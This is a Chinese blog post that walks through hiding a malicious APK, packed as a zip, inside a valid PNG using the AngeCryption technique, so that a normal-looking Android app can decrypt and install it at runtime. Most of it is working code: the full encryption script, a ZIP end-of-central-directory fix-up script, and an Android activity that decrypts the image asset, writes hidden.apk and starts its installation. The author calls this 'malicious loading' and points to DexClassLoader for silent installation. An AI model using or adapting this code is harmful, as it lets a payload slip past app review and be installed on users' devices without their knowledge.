图片隐藏文件技术

最新推荐文章于 2022-04-06 16:46:50 发布
最新推荐文章于 2022-04-06 16:46:50 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 文件隐藏,恶意加载,android漏洞,图片
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012292247/article/details/60324674
版权

 

之前看到一篇关于将文件隐藏在图片中的技术介绍,感觉非常有意思,于是研究了一下,它介绍的是将恶意apk文件加密成一张图片,再把它放到正常的apk里,当用户点击这张图片的时候再将它解密,就能实现恶意加载了,不过经过自己的测试,apk文件处理后会导致签名校验失败,从而导致无法安装,重新签名的话又不能加密成图片,一个办法就是将apk文件压缩成一个zip文件,再把这个zip文件加密成图片就可以了。

 

下面是将zip文件隐藏在图片中的介绍:

 

一、        处理原始文件

这步很重要,因为直接将文件通过AES加密的话并不能形成一张有效的图片,必须经过特殊处理,下面是处理脚本:

 

#AngeCryption:getting valid files after encryption
 
#takesany file as input, and a standard PDF/PNG/JPG as target
#willcreate a result_file that is source_file with appended 'garbage'
#andonce ENcrypted with the chosen algorithm with the supplied script, it will showtarget_file
 
#anyblock cipher is supported as long as the block size matches the target type'sheader
 
#AngeAlbertini 2014, BSD Licence - with the help of Jean-Philippe Aumasson
 
# -Added FLV support
 
importstruct
importsys
importbinascii
 
PNGSIG ='\x89PNG\r\n\x1a\n'
JPGSIG ="\xff\xd8"
FLVSIG ="FLV"
 
source_file,target_file, result_file, encryption_key, algo = sys.argv[1:6]
 
ifalgo.lower() == "aes":
    from Crypto.Cipher import AES
    algo = AES
    BS = 16
else:
    from Crypto.Cipher import DES3 # will workonly with JPEG as others require 16 bytes block size
    algo = DES3
    BS = 8
 
pad =lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) # non-standard paddingmight be preferred for PDF
 
#fromCrypto import Random
#key =Random.new().read(16)
key =encryption_key
 
withopen(source_file, "rb") as f:
    s = pad(f.read())
 
with open(target_file,"rb") as f:
    t = pad(f.read())
 
p =s[:BS] # our first plaintext block
ecb_dec= algo.new(key, algo.MODE_ECB)
 
# weneed to generate our first cipher block, depending on the target type
 
ift.startswith(PNGSIG): #PNG
    assert BS >= 16
    size = len(s) - BS
 
    # our dummy chunk type
    # 4 letters, first letter should belowercase to be ignored
    chunktype = 'aaaa'
 
    # PNG signature, chunk size, our dummychunk type
    c = PNGSIG +struct.pack(">I",size) + chunktype
 
    c = ecb_dec.decrypt(c)
    IV = "".join([chr(ord(c[i]) ^ord(p[i])) for i in range(BS)])
    cbc_enc = algo.new(key, algo.MODE_CBC, IV)
    result = cbc_enc.encrypt(s)
 
    #write the CRC of the remaining of s at theend of our dummy block
    result = result +struct.pack(">I", binascii.crc32(result[12:]) % 0x100000000)
    #and append the actual data of t, skippingthe sig
    result = result + t[8:]
 
elift.startswith(JPGSIG): #JPG
    assert BS >= 2
 
    size = len(s) - BS # we could make thisshorter, but then could require padding again
 
    # JPEG Start of Image, COMment segmentmarker, segment size, padding
    c = JPGSIG + "\xFF\xFE" +struct.pack(">H",size) + "\0" * 10
 
    c = ecb_dec.decrypt(c)
    IV = "".join([chr(ord(c[i]) ^ord(p[i])) for i in range(BS)])
    cbc_enc = algo.new(key, algo.MODE_CBC, IV)
    result = cbc_enc.encrypt(s)
 
    #and append the actual data of t, skippingthe sig
    result = result + t[2:]
elift.startswith(FLVSIG):
    assert BS >= 9
    size = len(s) - BS # we could make thisshorter, but then could require padding again
 
    # reusing FLV's sig and type, data offset,padding
    c = t[:5] +struct.pack(">I",size + 16) + "\0" * 7
 
    c = ecb_dec.decrypt(c)
    IV = "".join([chr(ord(c[i]) ^ord(p[i])) for i in range(BS)])
    cbc_enc = algo.new(key, algo.MODE_CBC, IV)
    result = cbc_enc.encrypt(s)
 
    #and append the actual data of t, skippingthe sig
    result = result + t[9:]
elift.find("%PDF-") > -1:
    assert BS >= 16
    size = len(s) - BS # we take the wholefirst 16 bits
 
    #truncated signature, dummy stream objectstart
    c = "%PDF-\0obj\nstream"
 
    c = ecb_dec.decrypt(c)
    IV = "".join([chr(ord(c[i]) ^ord(p[i])) for i in range(BS)])
    cbc_enc = algo.new(key, algo.MODE_CBC, IV)
    result = cbc_enc.encrypt(s)
 
    #close the dummy object and append thewhole t
    #(we don't know where the sig is, we can'tskip anything)
    result = result +"\nendstream\nendobj\n" + t
 
else:
    print "file type not supported"
    sys.exit()
 
 
#we haveour result, key and IV
 
#generatethe result file
cbc_dec= algo.new(key, algo.MODE_CBC, IV)
withopen(result_file, "wb") as f:
    f.write(cbc_dec.decrypt(pad(result)))
 
#generatethe script
result_file= "eocd2_"+result_file
print"""from Crypto.Cipher import %(algo)s
BS=%(BS)d
pad =%(pad)s
algo =%(algo)s.new(%(key)s, %(algo)s.MODE_CBC, %(IV)s)
 
withopen(%(source)s, "rb") as f:
d = pad(f.read())
 
d =algo.encrypt(d)
 
withopen("dec-" + %(target)s, "wb") as f:
f.write(d)""" % {
        'algo':algo.__name__.split(".")[-1],
        'BS':BS,
        'pad':"lambda s: s + (BS - len(s) %BS) * chr(BS - len(s) % BS)",
        'key':`key`,
        'IV':`IV`,
        'source':`result_file`,
        'target':`target_file`}

以上面的PNG图片为例来介绍一下处理的流程。

 

 

1、 PNG图片特征:

      1) PNG图片开头以\x89PNG\r\n\x1a\n八个字节作为图片识别标志

      2) PNG图片中的垃圾数据格式

             Chunk length

             Chunk id

             Chunk data

             CRC32 of chunk data and id

2、 了解了PNG图片特征,那么我们就知道文件要想成为一张有效的PNG图片,需要两个步骤,一个是加入PNG头部标识,二是将原始文件数据标识为垃圾数据,这样就能成为有效的图片了

 

3、 代码分析:

1) 原始文件转换成图片:

IV ="".join([chr(ord(c[i]) ^ ord(p[i])) for i in range(BS)])

关键在于这个,AES加密是分块加密的,每个块16个字节,加密用的IV是上一个IV转换的,但是我们只需要控制第一块数据就行了,上面这个IV就是将第一块数据转换成PNG图片前八个字节+Garbage Chunk格式,其中Garbage Chunk目的就是将原始文件数据标志为垃圾数据,这样识别的时候就成为了一张有效图片了

 

2) 图片还原成原始图片:

经过上面的处理后可以形成一张隐藏了文件的图片,然后通过AES解密就能将第一块数据还原成原始文件的数据,又因为ZIP文件这种都有一个EOCD(end of central directory)标志在末尾,因此还原后识别就不会把PNG数据考虑进去,不过也有一个问题,解压缩软件不接受ZIP文件末尾有太多的附加数据,这个会导致无法解压。因此还需要一个步骤

   

3) 添加EOCD:

既然解压缩软件无法接受末尾多余数据,那么就需要在处理后的文件末尾再加上一个EOCD,那么这个EOCD怎么获取呢,当然是去读取原始文件的EOCD了,下面是脚本:

 

#duplicate & adjust the EoCD of a ZIP archive at the bottom of the file
# toincrease compatibility in the case of big appended data
 
#AngeAlbertini, BSD Licence 2014
#AxelleApvrille, modif to use from command line
 
importstruct
importsys
 
defGetExtraEoCD(data, delta):
    """returns the adjusted EoCDof a ZIP file"""
    #Locate the signature of End of CentralDirectory
    eocdoff = data.find("PK\5\6")
 
    #read the comment length to get the fullEoCD length
    cmtlen = struct.unpack("<H",data[eocdoff + 5 * 4: eocdoff + 5 * 4 + 2])[0]
 
    #grab the EoCD data
    eocdlen = cmtlen + 5 * 4 + 2
    eocd = data[eocdoff: eocdoff + eocdlen + 1]
 
    #the relative offset of the EoCD to the CDneeds to be read
    reloff = struct.unpack("<L",eocd[3 * 4: 3 * 4 + 4]) [0]
 
    #then adjusted
    reloff += DELTA + eocdlen # the previousEoCD is now irrelevant
    eocd = eocd[:3 * 4] +struct.pack("<L", reloff) + eocd[3 * 4 + 4:]
 
    return eocd
 
if__name__ == "__main__":
    fn = sys.argv[1]
 
    DELTA = 256 * 1024
 
    with open(fn, "rb") as f:
        d = f.read()
 
    with open("eocd2_" + fn,"wb") as f:
        f.write(d + "\0" * DELTA +GetExtraEoCD(d, DELTA))

经过上面的处理后就大功告成了,可以把处理后的文件用之前设置好的IV和key来加密成一张图片了。注意的是你必须使用之前的IV和key,因为这样加密后的才是按照上面介绍的预期效果,否则无效。

 

 

 

二、        软件运行时动态解密图片

上面介绍了如何将zip文件加密成图片,接着介绍如何将这张图片动态解密成zip文件,下面是主要代码:

 

package com.fortiguard.poc.angecrypt;
 
import android.widget.TextView;
import android.widget.Button;
import android.view.View;
import android.app.Activity;
import android.os.Bundle;
import android.content.res.AssetManager;
import java.io.*;
import android.content.Intent;
import android.net.Uri;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.SecretKeySpec;
import javax.crypto.spec.IvParameterSpec;
import android.widget.Toast;
import android.util.Log;
import android.content.Context;
import android.os.Environment;
import android.widget.ImageView;
import android.graphics.drawable.Drawable;
 
public class PocActivity extends Activity
{
    public TextView txtView = null;
    public ImageView mImage = null;
 
    // full path name for decrypted APK: e.g/storage/sdcard/hidden.apk
    public static final String PAYLOAD_APK =Environment.getExternalStorageDirectory() + "/hidden.apk";
 
    /** Called when the activity is firstcreated. */
    @Override
    public void onCreate(BundlesavedInstanceState)    {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
 
        txtView = (TextView)findViewById(R.id.txtView);
        Button goBtn = (Button)findViewById(R.id.goBtn);
        mImage = (ImageView)findViewById(R.id.image);
 
       // display the png
       try {
         InputStream ims = getAssets().open("anakin.png");
         Drawable d = Drawable.createFromStream(ims, null);
         mImage.setImageDrawable(d);
         Log.i("PoC", "Image displayed");
       }
       catch(IOException exp) {
         Log.e("PoC", "Image display exception caught:"+exp.toString());
         exp.printStackTrace();
         txtView.setText("An error occurred :(");
       }
 
      // do the job when the GO button is pressed
      goBtn.setOnClickListener(newView.OnClickListener()         {
            public void onClick(View v)             {               
             try {
                Log.i("PoC", "reading asset...");
                byte [] png = readAsset("anakin.png");
 
                // decrypting
                String key = "Anakin= DarkSide";
                byte [] iv = { (byte) 0xd3,(byte) 0x9e,(byte) 0xc,(byte) 0xef,
                         (byte) 0x23,(byte) 0x70,(byte) 0x2a,(byte)0xa3,
                         (byte) 0xe9,(byte) 0x8a,(byte) 0xcc,(byte)0x3a,
                         (byte) 0x2b,(byte) 0xf0,(byte) 0x1a,(byte)0xec };
 
 
                 Log.i("PoC", "decrypting asset...");
                 byte [] decrypted = decrypt(key.getBytes(), iv, png);
 
                 // dumping the decrypted asset
                 Log.i("PoC", "writing decrypted asset to: "+PocActivity.PAYLOAD_APK);
                 writeFile(decrypted, PocActivity.PAYLOAD_APK);
 
                 // installing it
                 Log.i("PoC", "installing apk...");
                 installApk(PocActivity.PAYLOAD_APK);
 
                 Log.i("PoC", "done");
                 txtView.setText("The hidden APK has been installed!");
              }
              catch(Exception exp) {
                 Log.e("PoC", "Exception caught: "+exp.toString());
                 exp.printStackTrace();
                 txtView.setText("An error occurred :(");
              }
            }
        });
    }
 
    public byte [] readAsset(String filename)throws IOException {
       AssetManager assetmanager = getAssets();
       InputStream in = assetmanager.open(filename);
       int size = in.available();
       byte[] buffer = new byte[size];
       in.read(buffer);
       in.close();
       return buffer;
    }
 
    public void writeFile(byte [] array, Stringfilename) throws Exception {
       File myFile = new File(filename);
       myFile.createNewFile();
       FileOutputStream fout = newFileOutputStream(myFile);
       fout.write(array, 0, array.length);
       fout.close();
    }
 
    public void installApk(String filename) {
       Intent intent =new Intent(Intent.ACTION_VIEW);
       Log.i("PoC", "File:"+filename);
       //     
       intent.setClassName("com.fortiguard.hidestr","com.fortiguard.hidestr.HideString");
       intent.setDataAndType(Uri.fromFile(newFile(filename)), 
       "application/vnd.android.package-archive");
       //     intent.setPackage("com.fortiguard.hidestr");
       intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
       Log.i("PoC", "Intent is:"+intent.toString());
       startActivity(intent);
    }
 
    private static byte[] decrypt(byte[]keyBytes,
                        byte [] iv,
                        byte[] ciphertext) throws Exception {
       IvParameterSpec ivspec = newIvParameterSpec(iv);
       SecretKeySpec sk = new SecretKeySpec(keyBytes,"AES");
       Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");
       cipher.init(Cipher.DECRYPT_MODE, sk, ivspec);
       byte[] decrypted = cipher.doFinal(ciphertext);
       return decrypted;
    }
 
}

只要将上面的IV和key替换成你加密后的就行了,当然如果想实现静默安装,可以考虑用DexClassLoader等技术实现,这里就不多介绍了。另外附赠一个代码链接:

 

 

https://github.com/cryptax/angeapk

       

梦翼-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
隐藏文件图片
01-20
隐藏文件图片
图片隐藏文件
11-09
总的来说,图片隐藏文件是一种巧妙的技巧,可以在有限制的环境下传输文件。然而,需要注意的是,虽然这种方法有一定的欺骗性,但在高度安全的环境中,可能会被高级的检测手段识破。因此,这种技术更适用于低风险的...
文件隐藏图片
dotNET跨平台
06-05 908
一、前言有的时候我们需要把文件隐藏起来,但是Windows自带的隐藏方式还是很容易被发现的。这时候我们可以选择把文件放在网盘,但这毕竟需要网络。不过,我们可以通过Win...
通过jpg图片隐藏文件
weixin_33675507的博客
03-27 1232
2019独角兽企业重金招聘Python工程师标准>>> ...
如何把任意文件隐藏在一张图片里?
ding_net的专栏
07-19 1350
准备:1.一张图片 2.一个做试验的mp3文件 3.WinRAR步骤:1:准备一张图片,比如 winshome.jpg。准备目标文件,比如test.mp3。我们要实现把test.mp3隐藏图片里面。2:把要隐藏文件 test.mp3 用 WinRAR 压缩。生成 test.r
图片隐藏文件
rotation博客
04-08 7476
如何把重要文件隐藏起来有好多方法,接下来介绍一种把文件隐藏图片文件的方法。 挺有意思的,如果不查看图片的具体大小,一般很难想到图片中会藏有别的文件。 1.把准备文件放到同一个目录 如图,我准备了一个图片,并把要保存的文件打包。 2.接着在文件夹中新建一个TXT文档,如图所示。 3.打开文档,并将命令写入文档中,并保存。 命令格式如下:COPY 图片
文件隐藏图片中demo
01-08
"文件隐藏图片中demo"就是一个关于如何将文件嵌入图片中的示例。这种技术通常被称为数据隐藏或者信息隐藏,它允许用户将敏感数据伪装成看似无害的图片,从而避免被未经授权的人发现。以下是对这个主题的详细解释:...
图片隐藏文件源码
11-17
标题中的“图片隐藏文件源码”指的是一个编程项目,它实现了将文件隐藏图片(BMP格式)中的功能。这种技术通常称为数据隐藏或信息隐藏,它允许用户在不引起注意的情况下存储额外的数据。在安全通信、版权保护或...
文件隐藏图片工具
03-21
隐藏文件的过程是通过修改图片的像素值,将文件的二进制数据转化为对人眼无感知的微小变化,使得普通查看者无法察觉到图片隐藏的信息。 【文件隐藏图片工具】采用的加密机制增强了安全性。在隐藏文件前,用户需要...
LSB,RSA的图片隐藏技术.zip
07-07
基于LSB和RSA的图片隐藏技术,使用的是24位位图。
文件隐藏图片
02-20
文件隐藏图片
驱动级文件隐藏技术
03-25
驱动级文件隐藏技术 让你的文件资源深藏电脑之中
文件隐藏的三种技术
丿灬安之若死
08-12 2566
黑客总是想把一些文件能长久地留在肉鸡上,一般人喜欢把文件放在%systemroot%\system32\下,对付一般的用户而言是够了,但是如果对方是高手,必须深入挖掘一些文件隐藏技术,一来躲过肉鸡管理员的目测;二来还可以躲过一部分杀毒软件的扫描与查杀. 1.简单隐藏.利用attrib命令来给文件目录加隐藏与系统属性.比如将C:Windows\blue文件设置为系统文件隐藏,打开命令提示符窗口并...
文件隐藏到一张图片
码小农
08-26 697
1:准备一张图片,比如 home.jpg。准备目标文件,比如test.txt。我们要实现把test.txt隐藏图片里面。  2:把要隐藏文件 test.txt 用 WinRAR 压缩。生成 test.rar 压缩包 3:打开命令行提示符:点击“开始→运行”,输入“cmd”。  4:我们假设中两个文件都存放在“ D:”下。输入命令:copy /b D:home.jpg + D:test.
怎么在一张图片隐藏文件
二哈喇子!
04-06 5065
隐藏文件的最高境界是什么
文件隐藏图片
xiuxingzhe3000的专栏
06-07 684
先准备一个jpg图片,假设为a.jpg 再准备一个压缩文件,假设为b.rar 两个文件放到一个文件夹,假设都放在d盘根目录,开始--运行--输入cmd--回车, 在打开的dos窗口输入下面的命令: d:   按回车 copy /b a.jpg+b.rar a.jpg 这样b.rar就隐藏到a.jpg中了,用压缩软件打开a.jpg就能看到b.rar文件了。
文件隐藏技术(一)
anhkgg的专栏
05-21 774
地址: http://www.cnblogs.com/qiuyi21/articles/1151923.html http://www.smrhack.cn/xinwenhtml/xinwen46.html http://www.tdcqjslt.com/read.php?tid-299.html http://www.tdcqjslt.com/simple/?t299.htm
opencv-python实现图片隐藏文件
WTOte的博客
11-01 2489
因为最近接触到了大佬们做的图片文件夹、图片化打包以及各种无影坦克,觉得非常有趣,所以用python做了一个简单的小玩具。因为本身没有多少编程经验,所以希望看到这篇文章的大佬们不吝赐教。 1、功能:将文件通过更改像素值的方式写入准备好的图片(表图),达到隐藏文件的目的。 2、原理:通过opencv将表图分解为B、G、R三个通道,仅更改每个像素三个通道的最后一位(大于255则减10)实现单个像素存储数字0~999,以此实现数据的存储。 存储结构: 指令ID + 指令内容 + 指令ID...
基于文件流的文件隐藏技术
08-16 1060
alternate data streams(交换数据流).NTFS交换数据流(ADSs)是为了和Macintosh的HFS文件系统兼容而设计的,它使用资源派生(resource forks)来维持与文件,比如说图标及其他的东西.而微软提供了一种方法通过Windows explorer来创建特殊的ADSs,检测这种特殊的ADSs的必要工具和功能相当缺乏.说来也奇怪,系统一直以来都有允许用户
python 将一张图片隐藏到另外一张图片
最新发布
07-08
在Python中,可以使用隐写术(Steganography)的技术将一张图片隐藏到另外一张图片中。下面是一个实现该功能的简单示例: 首先,我们需要导入PIL库(Python Imaging Library),它提供了图像处理的功能。 ```...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值